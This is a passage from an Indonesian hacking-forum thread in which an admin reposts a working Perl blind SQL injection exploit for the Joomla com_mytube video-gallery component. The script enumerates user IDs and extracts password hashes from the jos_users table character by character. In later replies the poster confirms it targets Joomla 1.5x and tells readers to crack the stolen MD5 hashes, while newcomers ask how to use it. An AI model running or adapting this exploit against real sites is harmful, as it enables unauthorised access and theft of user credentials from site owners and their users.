Similar topics
    Latest topics
    IBC chat

    ShoutMix chat widget
    Navigation
     Portal
     Index
     Memberlist
     Profile
     FAQ
     Search

    Joomla SQL injection

    Go down

    Joomla SQL injection

    Post  sinax89 on Wed Oct 14, 2009 11:08 pm

    #!/usr/bin/perl -w

    #---------------------------------------------------------------------------------
    #joomla component com_mytube (user_id) Blind SQL Injection Vulnerability
    #---------------------------------------------------------------------------------

    #Author : Chip D3 Bi0s
    #Group : LatiHackTeam
    #Email : chipdebios[alt+64]gmail.com
    #Date : 15 September 2009
    #Critical Lvl : Moderate
    #Impact : Exposure of sensitive information
    #Where : From Remote
    #---------------------------------------------------------------------------

    #Affected software description:
    #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    #Application : MyRemote Video Gallery
    #version : 1.0 Beta
    #Developer : Jomtube Team
    #License : GPL type : Non-Commercial
    #Date Added : Aug 24, 2009
    #Download : http://joomlacode.org/gf/download/frsrelease/10834/42943/com_mytube_1.0.0_2009.08.02.zip
    #Description :

    #MyRemote Video Gallery is the most Powerful Video Extension made for Joomla 1.5x
    #which will allow you to transform your Website into a professional looking Video
    #Gallery with functionality that is similar to YouTube.com. MyRemote Video Gallery
    #is an open source (GNU GPL) video sharing Joomla extension has been created
    #specifically for the Joomla 1.5x (MVC) Framework and can not be used without Joomla.

    #MyRemote Video Gallery gives you the option to Embed Videos from Youtube and offers
    #the Framework so you can create your own Remote Plugins for other Remote Servers like
    #Dailymotion, Google Video, Vimeo, Blip.tv, Clipser, Revver, a which will allow you to
    #run your site for low cost since all the bandwidth usage and hard drive space is located
    #on the video server sites. So if you already have a large library of Videos on some
    #Remote Sites like Youtube.com you can build the Video Part of your Site Very Quickly.

    #---------------------------------------------------------------------------


    #I.Blind SQL injection (user_id)
    #Poc/Exploit:
    #~~~~~~~~~~~
    #http://127.0.0.1/[path]/index.php?view=videos&type=member&user_id=X[blind]&option=com_mytube&Itemid=null
    #X: Valid User_id

    #+++++++++++++++++++++++++++++++++++++++
    #[!] Produced in South America
    #+++++++++++++++++++++++++++++++++++++++


    use LWP::UserAgent;
    use Benchmark;
    my $t1 = new Benchmark;

    system ('cls');
    print "\n\n";
    print "\t\t[+] ---------------------------------[+]\n";
    print "\t\t| | Chip d3 Bi0s | |\n";
    print "\t\t| MyRemote Video Gallery Bsql | \n";
    print "\t\t|joomla component com_mytube (user_id)| \n";
    print "\t\t[+]----------------------------------[+]\n\n";


    print "http://127.0.0.1/[path]/index.php?view=videos&type=member&user_id=62:\n";chomp(my $target=<STDIN>);

    $w="Total Videos In Category";
    $column_name="concat(password)";
    $table_name="jos_users";


    $b = LWP::UserAgent->new() or die "Could not initialize browser\n";
    $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

    print "----------------Inyectando----------------\n";


    $host = $target . "+and+1=1&option=com_mytube&Itemid=null";
    my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w;
    if ($content =~ /$regexp/) {

    $host = $target . "+and+1=2&option=com_mytube&Itemid=null";
    my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w;
    if ($content =~ /$regexp/) {print " [-] Exploit Fallo Sad\n";}

    else

    {print " [-] Vulnerable Smile\n";

    $d=0;


    for ($idusuario=62;$idusuario<=80;$idusuario++)

    {

    $host = $target . "+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+where+id=".$idusuario."+limit+0,1),1,1))>0&option=com_mytube&Itemid=null";
    my $res = $b->request(HTTP::Request->new(GET=>$host));
    my $content = $res->content;
    my $regexp = $w;
    if ($content =~ /$regexp/) {$idusu[$d]=$idusuario;$d=$d+1}

    }

    print " [+] Usuario existentes : "." ".join(',', @idusu) . "\n";

    print " [-] # Usuario que desea extraer : ";chomp($iduss=<STDIN>);

    for ($x=1;$x<=32;$x++)
    {

    $host = $target . "+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+where+id=".$iduss."+limit+0,1),".$x.",1))>57&option=com_mytube&Itemid=null";
    my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w;
    print " [!] ";if($x <= 9 ) {print "0$x";}else{print $x;}
    if ($content =~ /$regexp/)
    {

    for ($c=97;$c<=102;$c++)

    {
    $host = $target . "+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+where+id=".$iduss."+limit+0,1),".$x.",1))=".$c."&option=com_mytube&Itemid=null";
    my $res = $b->request(HTTP::Request->new(GET=>$host));
    my $content = $res->content;
    my $regexp = $w;


    if ($content =~ /$regexp/) {$char=chr($c); $caracter[$x-1]=chr($c); print "-Caracter: $char\n"; $c=102;}
    }


    }
    else
    {

    for ($c=48;$c<=57;$c++)

    {
    $host = $target . "+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+where+id=".$iduss."+limit+0,1),".$x.",1))=".$c."&option=com_mytube&Itemid=null";
    my $res = $b->request(HTTP::Request->new(GET=>$host));
    my $content = $res->content;
    my $regexp = $w;

    if ($content =~ /$regexp/) {$char=chr($c); $caracter[$x-1]=chr($c); print "-Caracter: $char\n"; $c=57;}
    }


    }

    }

    print " [+] Password :"." ".join('', @caracter) . "\n";

    my $t2 = new Benchmark;
    my $tt = timediff($t2, $t1);
    print "El script tomo:",timestr($tt),"\n";

    }
    }

    else

    {print " [-] Exploit Fallo Sad\n";}



    #sumber : milw0rm.com [2009-09-21]
    sinax89
    sinax89
    Admin

    Posts : 72
    Join date : 2009-10-13
    Age : 29
    Location : Bekasi

    View user profile http://ibc-forum.forumotion.com

    Back to top Go down

    Pertamaxxx

    Post  elldhi on Thu Oct 15, 2009 12:34 am

    itu Joomlana bisa kita inject untuk versi joomla berapa sampe berapa???
    elldhi
    elldhi

    Posts : 4
    Join date : 2009-10-15

    View user profile

    Back to top Go down

    Re: Joomla SQL injection

    Post  sinax89 on Thu Oct 15, 2009 6:42 am

    elldhi wrote:itu Joomlana bisa kita inject untuk versi joomla berapa sampe berapa???


    itu joomla buat versi Joomla 1.5x di Coba ya... bom bom Twisted Evil

    biasanya kalau sudah berhasil kita dapet pasword MD5 tinggl di crack deh....

    slamat mencoba ... Twisted Evil
    sinax89
    sinax89
    Admin

    Posts : 72
    Join date : 2009-10-13
    Age : 29
    Location : Bekasi

    View user profile http://ibc-forum.forumotion.com

    Back to top Go down

    Re: Joomla SQL injection

    Post  g34rboxxx on Wed Oct 21, 2009 9:47 am

    Kayaknya kenal dech ini source code ......???? hehehehhe... Basketball
    g34rboxxx
    g34rboxxx
    Admin

    Posts : 250
    Join date : 2009-10-19
    Age : 42
    Location : Tebak hayooo

    View user profile

    Back to top Go down

    Re: Joomla SQL injection

    Post  sinax89 on Wed Oct 21, 2009 1:24 pm

    g34rboxxx wrote:Kayaknya kenal dech ini source code ......???? hehehehhe... Basketball

    hahaha..... tuh kan dari Milworm.... gmn c ??? affraid Twisted Evil
    sinax89
    sinax89
    Admin

    Posts : 72
    Join date : 2009-10-13
    Age : 29
    Location : Bekasi

    View user profile http://ibc-forum.forumotion.com

    Back to top Go down

    Re: Joomla SQL injection

    Post  g34rboxxx on Thu Oct 22, 2009 4:15 pm

    Tuchkan bener nyomotnya disitu........hihihihi............. lol! lol! lol!
    g34rboxxx
    g34rboxxx
    Admin

    Posts : 250
    Join date : 2009-10-19
    Age : 42
    Location : Tebak hayooo

    View user profile

    Back to top Go down

    Re: Joomla SQL injection

    Post  sinax89 on Thu Jan 14, 2010 9:55 am

    g34rboxxx wrote:Tuchkan bener nyomotnya disitu........hihihihi............. lol! lol! lol!

    namanya masih newbie jadi masih memanfaatakan exploit orang... hehehe Basketball Basketball
    sinax89
    sinax89
    Admin

    Posts : 72
    Join date : 2009-10-13
    Age : 29
    Location : Bekasi

    View user profile http://ibc-forum.forumotion.com

    Back to top Go down

    Re: Joomla SQL injection

    Post  sanov on Sat Mar 27, 2010 7:16 am

    maksudnya apa nih??? gak ngerti... mohon bimbingannya dund.... om sinax89(ceritanya gak tau nama aslinya) bimbinglah akuw
    sanov
    sanov

    Posts : 1
    Join date : 2010-03-27

    View user profile

    Back to top Go down

    Re: Joomla SQL injection

    Post  g34rboxxx on Fri Jun 04, 2010 9:36 am


    maksudnya apa nih??? gak ngerti... mohon bimbingannya dund.... om sinax89(ceritanya gak tau nama aslinya) bimbinglah akuw
    Berhubung bung sinaxxnya belum pulang dari laut .....jadi mohon bersabar .... affraid affraid affraid affraid ..........
    g34rboxxx
    g34rboxxx
    Admin

    Posts : 250
    Join date : 2009-10-19
    Age : 42
    Location : Tebak hayooo

    View user profile

    Back to top Go down

    ASK

    Post  Papyrus2 on Mon Nov 29, 2010 2:24 pm

    Itu cara ngegunaiinnya gmana kk??
    hehe..
    saya masih newbie mohon bimbingannya..
    ^^ Embarassed
    Papyrus2
    Papyrus2

    Posts : 13
    Join date : 2010-11-29
    Location : Dihatimu

    View user profile http://www.f-crown.blogspot.com

    Back to top Go down

    Re: Joomla SQL injection

    Post  Sponsored content


    Sponsored content


    Back to top Go down

    Back to top

    - Similar topics

     
    Permissions in this forum:
    You cannot reply to topics in this forum